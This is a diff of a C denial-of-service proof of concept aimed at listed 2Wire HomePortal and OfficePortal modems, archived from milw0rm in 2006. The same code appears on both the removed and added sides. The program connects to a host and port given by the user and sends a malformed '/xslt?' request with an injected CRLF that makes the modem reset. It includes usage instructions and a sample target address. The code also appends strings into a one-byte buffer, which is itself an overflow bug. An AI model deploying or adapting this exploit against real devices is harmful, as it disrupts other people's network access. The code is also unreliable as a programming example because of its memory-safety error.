|
1 | | -//Vulnerable: |
2 | | -//2Wire OfficePortal 0 |
3 | | -//2Wire HomePortal 1500W |
4 | | -//2Wire HomePortal 100W |
5 | | -//2Wire HomePortal 100S |
6 | | -//2Wire HomePortal 1000W |
7 | | -//2Wire HomePortal 1000SW |
8 | | -//2Wire HomePortal 1000S |
9 | | -//2Wire HomePortal 1000 |
10 | | -//2Wire HomePortal 0 |
11 | | -////////////////////////////////// [ STARTING CODE ] |
12 | | -//////////////////////////////////////////////////// |
13 | | -//// |
14 | | -//// [ Explanation ] this PoC make an evil_request |
15 | | -//// and send to the server , when the server process |
16 | | -//// it the request fall him, AND THE MODEM WILL RESET!. |
17 | | -//// |
18 | | -//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2 |
19 | | -//// If you have any error with the librarys you need |
20 | | -//// include libws2_32.a at the project. |
21 | | -//// |
22 | | -//// Enjoy it n_nU!.. |
23 | | -//// Coded by preth00nker (using Mexican skill!) |
24 | | - |
25 | | -#pragma comment(lib,"libws2_32.a") |
26 | | -#include <string.h> |
27 | | -#include <stdio.h> |
28 | | -#include <stdlib.h> |
29 | | -#include "winsock2.h" |
30 | | - |
31 | | -unsigned long dir; |
32 | | -char h[]=""; |
33 | | -short port; |
34 | | -char badreq[]=""; |
35 | | -int state; |
36 | | - |
37 | | -int main(int argc, char *argv[]) |
38 | | -{ |
39 | | - printf("\n################################################\n"); |
40 | | - printf("####\n"); |
41 | | - printf("#### PoC of DoS 2wire_Gateway\n"); |
42 | | - printf("#### By Preth00nker\n"); |
43 | | - printf("#### http://www.mexhackteam.org\n"); |
44 | | - printf("####\n"); |
45 | | - printf("####\n\n"); |
46 | | - if (argc<4){ |
47 | | - printf("[Usage] %s $Host $Port $Variable\n",argv[0]); |
48 | | - printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]); |
49 | | - return 0; |
50 | | - } |
51 | | - //Crear socket |
52 | | - WSADATA wsaData; |
53 | | - WSAStartup(MAKEWORD(2,2),&wsaData); |
54 | | - SOCKET wsck; |
55 | | - //Estructuras |
56 | | - struct sockaddr_in Wins; |
57 | | - struct hostent *target; |
58 | | - //Wins |
59 | | - Wins.sin_family=AF_INET; |
60 | | - Wins.sin_port=htons((short)atoi(argv[2])); |
61 | | - target=gethostbyname(argv[1]); |
62 | | - Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr)); |
63 | | - //llamamos al socket |
64 | | - wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL); |
65 | | - //Verifica por error |
66 | | - if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;} |
67 | | - printf("Socket creado correctamente!.. hWndl: %d",wsck); |
68 | | - //Conecta |
69 | | - if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){ |
70 | | - WSACleanup(); |
71 | | - return 0; |
72 | | - printf("\nError al conectar =!.."); |
73 | | - } |
74 | | - printf("\nConectado!.."); |
75 | | - //Make a bad query and send it ..Mwajuajua!.. |
76 | | - strcat(badreq,"GET /xslt?"); |
77 | | - strcat(badreq,argv[3]); |
78 | | - strcat(badreq,"=%0D%0A HTTP/1.0\r\n"); |
79 | | - strcat(badreq,"Accept-Language: es-mx\r\n"); |
80 | | - strcat(badreq,"User-Agent: MexHackTeam\r\n"); |
81 | | - strcat(badreq,"Host: "); |
82 | | - strcat(badreq,argv[1]); |
83 | | - strcat(badreq, "\r\n\r\n\r\n"); |
84 | | - send(wsck , badreq ,(int)strlen(badreq), 0); |
85 | | - printf("\nDatos Mandados!.."); |
86 | | - //finalized |
87 | | - Sleep(100); |
88 | | - printf("\nThat's all, Check this out!...\n"); |
89 | | - WSACleanup(); |
90 | | - return 0; |
91 | | -} |
92 | | -//////////////////////////////////////////// [ EOF ] |
93 | | -//////////////////////////////////////////////////// |
94 | | - |
95 | | -// milw0rm.com [2006-08-22] |
| 1 | +//Vulnerable: |
| 2 | +//2Wire OfficePortal 0 |
| 3 | +//2Wire HomePortal 1500W |
| 4 | +//2Wire HomePortal 100W |
| 5 | +//2Wire HomePortal 100S |
| 6 | +//2Wire HomePortal 1000W |
| 7 | +//2Wire HomePortal 1000SW |
| 8 | +//2Wire HomePortal 1000S |
| 9 | +//2Wire HomePortal 1000 |
| 10 | +//2Wire HomePortal 0 |
| 11 | +////////////////////////////////// [ STARTING CODE ] |
| 12 | +//////////////////////////////////////////////////// |
| 13 | +//// |
| 14 | +//// [ Explanation ] this PoC make an evil_request |
| 15 | +//// and send to the server , when the server process |
| 16 | +//// it the request fall him, AND THE MODEM WILL RESET!. |
| 17 | +//// |
| 18 | +//// [ Note ] This Poc was coded using Dev-C++ 4.9.9.2 |
| 19 | +//// If you have any error with the librarys you need |
| 20 | +//// include libws2_32.a at the project. |
| 21 | +//// |
| 22 | +//// Enjoy it n_nU!.. |
| 23 | +//// Coded by preth00nker (using Mexican skill!) |
| 24 | + |
| 25 | +#pragma comment(lib,"libws2_32.a") |
| 26 | +#include <string.h> |
| 27 | +#include <stdio.h> |
| 28 | +#include <stdlib.h> |
| 29 | +#include "winsock2.h" |
| 30 | + |
| 31 | +unsigned long dir; |
| 32 | +char h[]=""; |
| 33 | +short port; |
| 34 | +char badreq[]=""; |
| 35 | +int state; |
| 36 | + |
| 37 | +int main(int argc, char *argv[]) |
| 38 | +{ |
| 39 | + printf("\n################################################\n"); |
| 40 | + printf("####\n"); |
| 41 | + printf("#### PoC of DoS 2wire_Gateway\n"); |
| 42 | + printf("#### By Preth00nker\n"); |
| 43 | + printf("#### http://www.mexhackteam.org\n"); |
| 44 | + printf("####\n"); |
| 45 | + printf("####\n\n"); |
| 46 | + if (argc<4){ |
| 47 | + printf("[Usage] %s $Host $Port $Variable\n",argv[0]); |
| 48 | + printf("\n[I.E.] %s 192.168.1.254 80 PAGE\n",argv[0]); |
| 49 | + return 0; |
| 50 | + } |
| 51 | + //Crear socket |
| 52 | + WSADATA wsaData; |
| 53 | + WSAStartup(MAKEWORD(2,2),&wsaData); |
| 54 | + SOCKET wsck; |
| 55 | + //Estructuras |
| 56 | + struct sockaddr_in Wins; |
| 57 | + struct hostent *target; |
| 58 | + //Wins |
| 59 | + Wins.sin_family=AF_INET; |
| 60 | + Wins.sin_port=htons((short)atoi(argv[2])); |
| 61 | + target=gethostbyname(argv[1]); |
| 62 | + Wins.sin_addr.s_addr=inet_addr(inet_ntoa(*(struct in_addr *)target->h_addr)); |
| 63 | + //llamamos al socket |
| 64 | + wsck=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,(int unsigned)NULL,(int unsigned)NULL,(int unsigned)NULL); |
| 65 | + //Verifica por error |
| 66 | + if (wsck==SOCKET_ERROR){printf("Error al crear el socket =!..");WSACleanup();return 0;} |
| 67 | + printf("Socket creado correctamente!.. hWndl: %d",wsck); |
| 68 | + //Conecta |
| 69 | + if(WSAConnect(wsck,(SOCKADDR*)&Wins,sizeof(Wins),NULL,NULL,NULL,NULL)==SOCKET_ERROR){ |
| 70 | + WSACleanup(); |
| 71 | + return 0; |
| 72 | + printf("\nError al conectar =!.."); |
| 73 | + } |
| 74 | + printf("\nConectado!.."); |
| 75 | + //Make a bad query and send it ..Mwajuajua!.. |
| 76 | + strcat(badreq,"GET /xslt?"); |
| 77 | + strcat(badreq,argv[3]); |
| 78 | + strcat(badreq,"=%0D%0A HTTP/1.0\r\n"); |
| 79 | + strcat(badreq,"Accept-Language: es-mx\r\n"); |
| 80 | + strcat(badreq,"User-Agent: MexHackTeam\r\n"); |
| 81 | + strcat(badreq,"Host: "); |
| 82 | + strcat(badreq,argv[1]); |
| 83 | + strcat(badreq, "\r\n\r\n\r\n"); |
| 84 | + send(wsck , badreq ,(int)strlen(badreq), 0); |
| 85 | + printf("\nDatos Mandados!.."); |
| 86 | + //finalized |
| 87 | + Sleep(100); |
| 88 | + printf("\nThat's all, Check this out!...\n"); |
| 89 | + WSACleanup(); |
| 90 | + return 0; |
| 91 | +} |
| 92 | +//////////////////////////////////////////// [ EOF ] |
| 93 | +//////////////////////////////////////////////////// |
| 94 | + |
| 95 | +// milw0rm.com [2006-08-22] |
0 commit comments